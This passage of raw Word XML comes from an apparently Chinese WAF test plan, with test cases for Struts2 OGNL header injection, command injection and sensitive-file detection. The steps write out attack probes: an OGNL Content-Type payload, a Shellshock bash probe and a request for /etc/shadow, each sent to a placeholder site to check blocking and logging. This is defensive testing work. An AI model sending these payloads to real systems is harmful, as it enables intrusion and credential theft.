                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>并使用BurpSuite添加</w:t>
            </w:r>
            <w:bookmarkEnd w:id="65"/>
            <w:bookmarkEnd w:id="66"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Con</w:t>
            </w:r>
            <w:r>
              <w:t>tent-Type</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>字段：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B088829">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:wordWrap w:val="0"/>
              <w:spacing w:after="163"/>
              <w:ind w:left="357" w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:t>Content-Type: %{#context['com.opensymphony.xwork.dispatcher.HttpServletResponse']}Multipart</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="015C4A0A">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>查看W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是否对攻击进行拦截并记录攻击日志。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="56AF6812">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="7625965B">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="1B062B14">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85" name="Picture 385164385"/>
                  <wp:cNvGraphicFramePr>
                    <a:graphicFrameLocks noChangeAspect="1"/>
                  </wp:cNvGraphicFramePr>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="java_code_event_54a5acf0c1f247748bbc0594126d8c0c_basic_20260515_134316.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId33"/>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86" name="Picture 385164386"/>
                  <wp:cNvGraphicFramePr>
                    <a:graphicFrameLocks noChangeAspect="1"/>
                  </wp:cNvGraphicFramePr>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="java_code_event_54a5acf0c1f247748bbc0594126d8c0c_detail_20260515_134316.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId34"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4114800" cy="2314575"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1DE5A0BD">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="22385129">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>判定结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="658E4478">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2879DC8B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="0D5430C7">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="71E00C05">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3B3A11D4">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2907" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3DCACF27">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="660E7E03">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="550517CC">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="67" w:name="_Toc81916105"/>
      <w:bookmarkStart w:id="68" w:name="_Toc21077802"/>
      <w:bookmarkStart w:id="69" w:name="_Toc100312887"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
      <w:r>
        <w:t>注入攻击</w:t>
      </w:r>
      <w:bookmarkEnd w:id="67"/>
      <w:bookmarkEnd w:id="68"/>
      <w:bookmarkEnd w:id="6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E9AE76F">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="3F6EDDBA">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="1B3D02A3">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>命令注入攻击检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="569E0B87">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="67AD33FC">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="7AB04042">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>命令注入是指涉及动态生成内容的一类关键应用程序漏洞。攻击者使用易受攻击的应用程序在主机操作系统上执行任意命令。它们通过表单，cookie和HTTP头将错误数据传递给系统shell。这允许攻击者获得对网站的控制并执行底层应用程序所适应的任何操作或过程。获得对这些系统的访问权限的攻击者可以修改，操纵或读取数据; 注入窃取数据或攻击基础设施的命令; 并参与其他破坏性活动。命令注入高度依赖于特权。它发生在输入验证不足时。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="37D186BA">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="082D14EF">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>执行步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="4488D4F6">
            <w:pPr>
              <w:pStyle w:val="148"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15"/>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505ECDCA">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将W</w:t>
            </w:r>
            <w:r>
              <w:t>EB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>流量牵引至W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检测节点；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="600991DA">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在客户端构造请求，比如用浏览器访问如下链接：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A2D3F5F">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:left="360" w:firstLine="420"/>
            </w:pPr>
            <w:bookmarkStart w:id="70" w:name="OLE_LINK16"/>
            <w:bookmarkStart w:id="71" w:name="OLE_LINK15"/>
            <w:r>
              <w:t>http://www.site.com</w:t>
            </w:r>
            <w:bookmarkEnd w:id="70"/>
            <w:bookmarkEnd w:id="71"/>
          </w:p>
          <w:p w14:paraId="64E4FDEB">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>并使用BurpSuite添加b</w:t>
            </w:r>
            <w:r>
              <w:t>ody</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>内容：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FEE1B7B">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:left="360" w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:t>env x='(){:;}; echo vulnerable' bash -c "test"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CA101DF">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>查看W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是否对攻击进行拦截并记录攻击日志。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="287C4B88">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="7C2A68AE">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="01FED69F">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87" name="Picture 385164387"/>
                  <wp:cNvGraphicFramePr>
                    <a:graphicFrameLocks noChangeAspect="1"/>
                  </wp:cNvGraphicFramePr>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="code_event_bea6d4d399be437dbf6da0243273b6f6_basic_20260515_134316.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId35"/>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88" name="Picture 385164388"/>
                  <wp:cNvGraphicFramePr>
                    <a:graphicFrameLocks noChangeAspect="1"/>
                  </wp:cNvGraphicFramePr>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="code_event_bea6d4d399be437dbf6da0243273b6f6_detail_20260515_134316.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId36"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4114800" cy="2314575"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3C76071F">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="436A7BF9">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>判定结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6722C896">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C309E3A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="16FC07EE">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5DC8FCDE">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0299AE76">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2907" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5CC6A83A">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0032E9CC">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C3FD89A">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="72" w:name="_Toc81916106"/>
      <w:bookmarkStart w:id="73" w:name="_Toc21077803"/>
      <w:bookmarkStart w:id="74" w:name="_Toc184028914"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>情报模块</w:t>
      </w:r>
      <w:bookmarkEnd w:id="72"/>
      <w:bookmarkEnd w:id="73"/>
      <w:bookmarkEnd w:id="7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3EF0B71C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="78656D33">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="661B4346">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>情报模块检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7D1282DF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="33AD8F7B">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="24662126">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>情报模块根据请求中是否含有测试文件、备份文件、代码仓库、敏感文件来判断是否进行记录，上述文件的泄漏可以为攻击者提供一些信息来进行针对性的攻击。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6CC47BD5">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="4A339D92">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>执行步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="3930CDEB">
            <w:pPr>
              <w:pStyle w:val="148"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>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20588F15">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将W</w:t>
            </w:r>
            <w:r>
              <w:t>EB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>流量牵引至W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检测节点；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0075E2E3">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在客户端构造请求，比如用浏览器访问如下链接：</w:t>
            </w:r>
            <w:r>
              <w:t>http://www.site.com/etc/shadow</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="458DD22A">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>查看W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是否对攻击进行拦截并记录攻击日志。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="432F5AB3">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="48CF993B">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="5F365A34">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89" name="Picture 385164389"/>
                  <wp:cNvGraphicFramePr>
